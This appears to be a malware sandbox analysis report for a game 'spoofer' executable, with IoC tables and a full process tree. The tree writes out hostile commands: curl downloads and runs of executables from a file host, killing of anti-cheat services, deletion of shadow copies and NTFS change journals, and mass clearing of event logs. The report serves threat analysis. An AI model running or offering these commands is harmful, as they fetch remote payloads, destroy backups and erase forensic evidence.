Token: SeBackupPrivilege	1364	wevtutil.exe
Token: SeSecurityPrivilege	3044	wevtutil.exe
Token: SeBackupPrivilege	3044	wevtutil.exe
Token: SeSecurityPrivilege	1952	wevtutil.exe
Token: SeBackupPrivilege	1952	wevtutil.exe

Suspicious use of FindShellTrayWindow 26 IoCs

pid	Process
2320	msedge.exe
2320	msedge.exe
2320	msedge.exe
2320	msedge.exe
2320	msedge.exe
2320	msedge.exe
2320	msedge.exe
2320	msedge.exe
2320	msedge.exe
2320	msedge.exe
2320	msedge.exe
2320	msedge.exe
2320	msedge.exe
2320	msedge.exe
2320	msedge.exe
2320	msedge.exe
2320	msedge.exe
2320	msedge.exe
2320	msedge.exe
2320	msedge.exe
2320	msedge.exe
2320	msedge.exe
2320	msedge.exe
2320	msedge.exe
2320	msedge.exe
2320	msedge.exe

Suspicious use of SendNotifyMessage 24 IoCs

pid	Process
2320	msedge.exe
2320	msedge.exe
2320	msedge.exe
2320	msedge.exe
2320	msedge.exe
2320	msedge.exe
2320	msedge.exe
2320	msedge.exe
2320	msedge.exe
2320	msedge.exe
2320	msedge.exe
2320	msedge.exe
2320	msedge.exe
2320	msedge.exe
2320	msedge.exe
2320	msedge.exe
2320	msedge.exe
2320	msedge.exe
2320	msedge.exe
2320	msedge.exe
2320	msedge.exe
2320	msedge.exe
2320	msedge.exe
2320	msedge.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 4704 wrote to memory of 5008	4704	SnuVy Spoof.exe	86
PID 4704 wrote to memory of 5008	4704	SnuVy Spoof.exe	86
PID 5008 wrote to memory of 2320	5008	cmd.exe	87
PID 5008 wrote to memory of 2320	5008	cmd.exe	87
PID 2320 wrote to memory of 2520	2320	msedge.exe	89
PID 2320 wrote to memory of 2520	2320	msedge.exe	89
PID 4704 wrote to memory of 2000	4704	SnuVy Spoof.exe	90
PID 4704 wrote to memory of 2000	4704	SnuVy Spoof.exe	90
PID 4704 wrote to memory of 1788	4704	SnuVy Spoof.exe	91
PID 4704 wrote to memory of 1788	4704	SnuVy Spoof.exe	91
PID 1788 wrote to memory of 3184	1788	cmd.exe	92
PID 1788 wrote to memory of 3184	1788	cmd.exe	92
PID 1788 wrote to memory of 2036	1788	cmd.exe	93
PID 1788 wrote to memory of 2036	1788	cmd.exe	93
PID 1788 wrote to memory of 1328	1788	cmd.exe	94
PID 1788 wrote to memory of 1328	1788	cmd.exe	94
PID 2320 wrote to memory of 4152	2320	msedge.exe	95
PID 2320 wrote to memory of 4152	2320	msedge.exe	95
PID 2320 wrote to memory of 4152	2320	msedge.exe	95
PID 2320 wrote to memory of 4152	2320	msedge.exe	95
PID 2320 wrote to memory of 4152	2320	msedge.exe	95
PID 2320 wrote to memory of 4152	2320	msedge.exe	95
PID 2320 wrote to memory of 4152	2320	msedge.exe	95
PID 2320 wrote to memory of 4152	2320	msedge.exe	95
PID 2320 wrote to memory of 4152	2320	msedge.exe	95
PID 2320 wrote to memory of 4152	2320	msedge.exe	95
PID 2320 wrote to memory of 4152	2320	msedge.exe	95
PID 2320 wrote to memory of 4152	2320	msedge.exe	95
PID 2320 wrote to memory of 4152	2320	msedge.exe	95
PID 2320 wrote to memory of 4152	2320	msedge.exe	95
PID 2320 wrote to memory of 4152	2320	msedge.exe	95
PID 2320 wrote to memory of 4152	2320	msedge.exe	95
PID 2320 wrote to memory of 4152	2320	msedge.exe	95
PID 2320 wrote to memory of 4152	2320	msedge.exe	95
PID 2320 wrote to memory of 4152	2320	msedge.exe	95
PID 2320 wrote to memory of 4152	2320	msedge.exe	95
PID 2320 wrote to memory of 4152	2320	msedge.exe	95
PID 2320 wrote to memory of 4152	2320	msedge.exe	95
PID 2320 wrote to memory of 4152	2320	msedge.exe	95
PID 2320 wrote to memory of 4152	2320	msedge.exe	95
PID 2320 wrote to memory of 4152	2320	msedge.exe	95
PID 2320 wrote to memory of 4152	2320	msedge.exe	95
PID 2320 wrote to memory of 4152	2320	msedge.exe	95
PID 2320 wrote to memory of 4152	2320	msedge.exe	95
PID 2320 wrote to memory of 4152	2320	msedge.exe	95
PID 2320 wrote to memory of 4152	2320	msedge.exe	95
PID 2320 wrote to memory of 4152	2320	msedge.exe	95
PID 2320 wrote to memory of 4152	2320	msedge.exe	95
PID 2320 wrote to memory of 4152	2320	msedge.exe	95
PID 2320 wrote to memory of 4152	2320	msedge.exe	95
PID 2320 wrote to memory of 4152	2320	msedge.exe	95
PID 2320 wrote to memory of 4152	2320	msedge.exe	95
PID 2320 wrote to memory of 4152	2320	msedge.exe	95
PID 2320 wrote to memory of 4152	2320	msedge.exe	95
PID 2320 wrote to memory of 4152	2320	msedge.exe	95
PID 2320 wrote to memory of 4152	2320	msedge.exe	95
PID 2320 wrote to memory of 1032	2320	msedge.exe	96
PID 2320 wrote to memory of 1032	2320	msedge.exe	96
PID 2320 wrote to memory of 988	2320	msedge.exe	97
PID 2320 wrote to memory of 988	2320	msedge.exe	97
PID 2320 wrote to memory of 988	2320	msedge.exe	97
PID 2320 wrote to memory of 988	2320	msedge.exe	97
PID 2320 wrote to memory of 988	2320	msedge.exe	97
PID 2320 wrote to memory of 988	2320	msedge.exe	97

Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
ransomware

C:\Users\Admin\AppData\Local\Temp\SnuVy Spoof.exe
"C:\Users\Admin\AppData\Local\Temp\SnuVy Spoof.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:4704
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c start https://discord.gg/PSsPuPwU7E
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:5008
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://discord.gg/PSsPuPwU7E
    3⤵
    - Enumerates system info in registry
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
    - Suspicious use of FindShellTrayWindow
    - Suspicious use of SendNotifyMessage
    - Suspicious use of WriteProcessMemory
    PID:2320
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7fffbb5f46f8,0x7fffbb5f4708,0x7fffbb5f4718
      4⤵
      PID:2520
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2088,3275073905475350975,5729567898367424595,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2120 /prefetch:2
      4⤵
      PID:4152
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2088,3275073905475350975,5729567898367424595,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2240 /prefetch:3
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:1032
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2088,3275073905475350975,5729567898367424595,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2712 /prefetch:8
      4⤵
      PID:988
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2088,3275073905475350975,5729567898367424595,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3316 /prefetch:1
      4⤵
      PID:4160
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2088,3275073905475350975,5729567898367424595,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3324 /prefetch:1
      4⤵
      PID:3368
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2088,3275073905475350975,5729567898367424595,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4988 /prefetch:1
      4⤵
      PID:2464
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=2088,3275073905475350975,5729567898367424595,131072 --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=4132 /prefetch:8
      4⤵
      PID:3572
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --field-trial-handle=2088,3275073905475350975,5729567898367424595,131072 --lang=en-US --service-sandbox-type=video_capture --mojo-platform-channel-handle=3564 /prefetch:8
      4⤵
      Modifies registry class
      Suspicious behavior: EnumeratesProcesses
      PID:700
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c cls
  2⤵
  PID:2000
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c certutil -hashfile "C:\Users\Admin\AppData\Local\Temp\SnuVy Spoof.exe" MD5 | find /i /v "md5" | find /i /v "certutil"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1788
- - C:\Windows\system32\certutil.exe
    certutil -hashfile "C:\Users\Admin\AppData\Local\Temp\SnuVy Spoof.exe" MD5
    3⤵
    PID:3184
- - C:\Windows\system32\find.exe
    find /i /v "md5"
    3⤵
    PID:2036
- - C:\Windows\system32\find.exe
    find /i /v "certutil"
    3⤵
    PID:1328
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c cd %temp% & curl -L "https://files.catbox.moe/lndcmk.bin" -o %APPDATA%\ZRGHJR345.exe
  2⤵
  PID:1084
- - C:\Windows\system32\curl.exe
    curl -L "https://files.catbox.moe/lndcmk.bin" -o C:\Users\Admin\AppData\Roaming\ZRGHJR345.exe
    3⤵
    PID:1264
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c cls
  2⤵
  PID:1092
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c cd %temp% & curl -L "https://files.catbox.moe/dgmod9.rrs" -o %APPDATA%\XGEHIOPZE543.exe
  2⤵
  PID:4056
- - C:\Windows\system32\curl.exe
    curl -L "https://files.catbox.moe/dgmod9.rrs" -o C:\Users\Admin\AppData\Roaming\XGEHIOPZE543.exe
    3⤵
    PID:1832
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c cls
  2⤵
  PID:1488
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c cd %temp% & curl -L "https://files.catbox.moe/2v89lz.bat" -o %APPDATA%\XHVUER764.bat
  2⤵
  PID:3456
- - C:\Windows\system32\curl.exe
    curl -L "https://files.catbox.moe/2v89lz.bat" -o C:\Users\Admin\AppData\Roaming\XHVUER764.bat
    3⤵
    PID:3184
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c cls
  2⤵
  PID:4968
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c cd %temp% & curl -L "https://files.catbox.moe/xefma9.bin" -o %APPDATA%\y9cisa.exe
  2⤵
  PID:4232
- - C:\Windows\system32\curl.exe
    curl -L "https://files.catbox.moe/xefma9.bin" -o C:\Users\Admin\AppData\Roaming\y9cisa.exe
    3⤵
    PID:4292
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c cls
  2⤵
  PID:1364
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c cd %temp% & curl -L "https://files.catbox.moe/z3o23v.dll" -o %APPDATA%\Guna.UI2.dll
  2⤵
  PID:4780
- - C:\Windows\system32\curl.exe
    curl -L "https://files.catbox.moe/z3o23v.dll" -o C:\Users\Admin\AppData\Roaming\Guna.UI2.dll
    3⤵
    PID:436
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c cls
  2⤵
  PID:3420
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c cls
  2⤵
  PID:3272
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\ZRGHJR345.exe
  2⤵
  PID:244
- - C:\Users\Admin\AppData\Roaming\ZRGHJR345.exe
    C:\Users\Admin\AppData\Roaming\ZRGHJR345.exe
    3⤵
    - Executes dropped EXE
    PID:3736
  - - C:\Windows\system32\cmd.exe
      "C:\Windows\system32\cmd" /c "C:\Users\Admin\AppData\Local\Temp\7078.tmp\7079.tmp\707A.bat C:\Users\Admin\AppData\Roaming\ZRGHJR345.exe"
      4⤵
      PID:3056
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /f /im EasyAntiCheat.exe
        5⤵
        Cerber
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:3824
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /f /im BEService_x64.exe
        5⤵
        Cerber
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:4808
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /f /im EpicGamesLauncher.exe
        5⤵
        Cerber
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:2220
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /f /im FortniteClient-Win64-Shipping_BE.exe
        5⤵
        Cerber
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:3496
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /f /im FortniteClient-Win64-Shipping_EAC.exe
        5⤵
        Cerber
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:3024
    - - C:\Windows\system32\sc.exe
        
        sc stop BEService
        5⤵
        Launches sc.exe
        
        PID:752
    - - C:\Windows\system32\sc.exe
        
        sc stop EasyAntiCheat
        5⤵
        Launches sc.exe
        
        PID:4916
    - - C:\Windows\system32\reg.exe
        
        reg delete "HKEY_CURRENT_USER\Software\Epic Games\Unreal Engine\Hardware Survey" /f
        5⤵
        
        PID:4232
    - - C:\Windows\system32\reg.exe
        
        reg delete "HKEY_CURRENT_USER\Software\Epic Games\Unreal Engine\Identifiers" /f
        5⤵
        
        PID:1364
    - - C:\Windows\system32\reg.exe
        
        reg delete "HKU\S-1-5-21-860440266-1445122309-108474356-1001\Software\Epic Games\Unreal Engine\Identifiers" /va /f
        5⤵
        
        PID:4508
    - - C:\Windows\system32\reg.exe
        
        reg delete "HKU\S-1-5-21-860440266-1445122309-108474356-1001\Software\Epic Games\Unreal Engine\Hardware Survey" /va /f
        5⤵
        
        PID:3944
    - - C:\Windows\system32\reg.exe
        
        reg delete "HKEY_CURRENT_USER\Software\Epic Games" /f
        5⤵
        
        PID:2212
    - - C:\Windows\system32\reg.exe
        
        reg delete "HKU\S-1-5-21-860440266-1445122309-108474356-1001\Software\Epic Games" /f
        5⤵
        
        PID:4976
    - - C:\Windows\system32\reg.exe
        
        REG ADD HKLM\SYSTEM\CurrentControlSet\Control\ComputerName\ComputerName /v ComputerName /t REG_SZ /d 23075 /f
        5⤵
        Modifies registry key
        
        PID:5008
    - - C:\Windows\system32\reg.exe
        
        REG ADD HKLM\SYSTEM\CurrentControlSet\Control\ComputerName\ActiveComputerName /v ComputerName /t REG_SZ /d 31286 /f
        5⤵
        Modifies registry key
        
        PID:1124
    - - C:\Windows\system32\reg.exe
        
        reg delete "HKEY_CURRENT_USER\Software\Epic Games" /f
        5⤵
        
        PID:3064
    - - C:\Windows\system32\ARP.EXE
        
        arp -d
        5⤵
        
        PID:4828
    - - C:\Users\Admin\AppData\Roaming\FIXusrTEMPv6.exe
        
        "C:\Users\Admin\AppData\Roaming\FIXusrTEMPv6.exe"
        5⤵
        Executes dropped EXE
        
        PID:2940
      - C:\Windows\system32\cmd.exe
        
        "C:\Windows\system32\cmd" /c "C:\Users\Admin\AppData\Local\Temp\8D08.tmp\8D09.tmp\8D0A.bat C:\Users\Admin\AppData\Roaming\FIXusrTEMPv6.exe"
        6⤵
        
        PID:948
        
        C:\Windows\system32\PING.EXE
        
        ping /n 1 localhost
        7⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:2332
        
        C:\Windows\system32\PING.EXE
        
        ping /n 1 localhost
        7⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:1108
        
        C:\Windows\system32\PING.EXE
        
        ping /n 1 localhost
        7⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:4152
        
        C:\Windows\system32\PING.EXE
        
        ping /n 2 localhost
        7⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:2464
    - - C:\Windows\system32\PING.EXE
        
        PING localhost -n 3
        5⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:3536
    - - C:\Users\Admin\AppData\Roaming\ddc.exe
        
        C:\Users\Admin\AppData\Roaming\ddc.exe b /target:c:\DriverBackup4u
        5⤵
        Executes dropped EXE
        Checks system information in the registry
        System Location Discovery: System Language Discovery
        
        PID:3900
    - - C:\Windows\system32\PING.EXE
        
        PING localhost -n 3
        5⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:2728
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" echo Y "
        5⤵
        
        PID:3560
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" start "" /wait /b "C:\Users\Admin\AppData\Roaming\cleanerOLD1.exe""
        5⤵
        
        PID:3528
      - C:\Users\Admin\AppData\Roaming\cleanerOLD1.exe
        
        "C:\Users\Admin\AppData\Roaming\cleanerOLD1.exe"
        6⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1416
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" echo Y "
        5⤵
        
        PID:2956
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" start "" /wait /b "C:\Users\Admin\AppData\Roaming\Cleaner8.exe""
        5⤵
        
        PID:3708
      - C:\Users\Admin\AppData\Roaming\Cleaner8.exe
        
        "C:\Users\Admin\AppData\Roaming\Cleaner8.exe"
        6⤵
        Drops startup file
        Executes dropped EXE
        Drops desktop.ini file(s)
        Drops file in System32 directory
        Drops file in Windows directory
        Enumerates system info in registry
        Modifies Internet Explorer settings
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:4808
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c fsutil usn deletejournal /d C:
        7⤵
        
        PID:4976
        
        C:\Windows\system32\fsutil.exe
        
        fsutil usn deletejournal /d C:
        8⤵
        Deletes NTFS Change Journal
        
        PID:5008
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c fsutil usn deletejournal /d D:
        7⤵
        
        PID:1124
        
        C:\Windows\system32\fsutil.exe
        
        fsutil usn deletejournal /d D:
        8⤵
        Deletes NTFS Change Journal
        Enumerates connected drives
        
        PID:3064
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c fsutil usn deletejournal /d E:
        7⤵
        
        PID:3772
        
        C:\Windows\system32\fsutil.exe
        
        fsutil usn deletejournal /d E:
        8⤵
        Deletes NTFS Change Journal
        Enumerates connected drives
        
        PID:1764
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c vssadmin delete shadows /All /Quiet
        7⤵
        
        PID:4468
        
        C:\Windows\system32\vssadmin.exe
        
        vssadmin delete shadows /All /Quiet
        8⤵
        Interacts with shadow copies
        
        PID:2332
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c net stop winmgmt /Y
        7⤵
        
        PID:3536
        
        C:\Windows\system32\net.exe
        
        net stop winmgmt /Y
        8⤵
        
        PID:1360
        
        C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop winmgmt /Y
        9⤵
        
        PID:3612
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c pause
        7⤵
        
        PID:3788
    - - C:\Users\Admin\AppData\Roaming\AdvancedEventCleaner.exe
        
        "C:\Users\Admin\AppData\Roaming\AdvancedEventCleaner.exe"
        5⤵
        Executes dropped EXE
        
        PID:632
      - C:\Windows\system32\cmd.exe
        
        "C:\Windows\system32\cmd" /c "C:\Users\Admin\AppData\Local\Temp\FCAB.tmp\FCAC.tmp\FCAD.bat C:\Users\Admin\AppData\Roaming\AdvancedEventCleaner.exe"
        6⤵
        
        PID:3464
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c bcdedit
        7⤵
        
        PID:4832
        
        C:\Windows\system32\bcdedit.exe
        
        bcdedit
        8⤵
        
        PID:4316
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c wevtutil.exe el
        7⤵
        
        PID:4308
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe el
        8⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:1944
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "AMSI/Debug"
        7⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:628
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "AirSpaceChannel"
        7⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:3540
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Analytic"
        7⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:3068
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Application"
        7⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:3624
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "DirectShowFilterGraph"
        7⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:540
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "DirectShowPluginControl"
        7⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:4924
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Els_Hyphenation/Analytic"
        7⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:3980
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "EndpointMapper"
        7⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:4260
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "FirstUXPerf-Analytic"
        7⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:5076
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "ForwardedEvents"
        7⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:420
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "General Logging"
        7⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:1092
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "HardwareEvents"
        7⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:4056
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "IHM_DebugChannel"
        7⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:4312
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Intel-iaLPSS-GPIO/Analytic"
        7⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:4328
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Intel-iaLPSS-I2C/Analytic"
        7⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:3560
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Intel-iaLPSS2-GPIO2/Debug"
        7⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:3528
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Intel-iaLPSS2-GPIO2/Performance"
        7⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:3012
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Intel-iaLPSS2-I2C/Debug"
        7⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:4524
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Intel-iaLPSS2-I2C/Performance"
        7⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:2904
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Internet Explorer"
        7⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:4028
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Key Management Service"
        7⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:5012
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "MF_MediaFoundationDeviceMFT"
        7⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:4588
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "MF_MediaFoundationDeviceProxy"
        7⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:3396
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "MF_MediaFoundationFrameServer"
        7⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:1364
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "MedaFoundationVideoProc"
        7⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:3044
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "MedaFoundationVideoProcD3D"
        7⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:1952
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "MediaFoundationAsyncWrapper"
        7⤵
        
        PID:2212
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "MediaFoundationContentProtection"
        7⤵
        
        PID:4860
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "MediaFoundationDS"
        7⤵
        
        PID:2672
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "MediaFoundationDeviceProxy"
        7⤵
        
        PID:3988
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "MediaFoundationMP4"
        7⤵
        
        PID:5092
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "MediaFoundationMediaEngine"
        7⤵
        
        PID:5064
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "MediaFoundationPerformance"
        7⤵
        
        PID:1764
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "MediaFoundationPerformanceCore"
        7⤵
        
        PID:3772
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "MediaFoundationPipeline"
        7⤵
        Clears Windows event logs
        
        PID:5072
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "MediaFoundationPlatform"
        7⤵
        
        PID:276
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "MediaFoundationSrcPrefetch"
        7⤵
        
        PID:292
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-AppV-Client-Streamingux/Debug"
        7⤵
        
        PID:988
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-AppV-Client/Admin"
        7⤵
        
        PID:4912
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-AppV-Client/Debug"
        7⤵
        
        PID:3720
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-AppV-Client/Operational"
        7⤵
        
        PID:224
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-AppV-Client/Virtual Applications"
        7⤵
        
        PID:3348
        
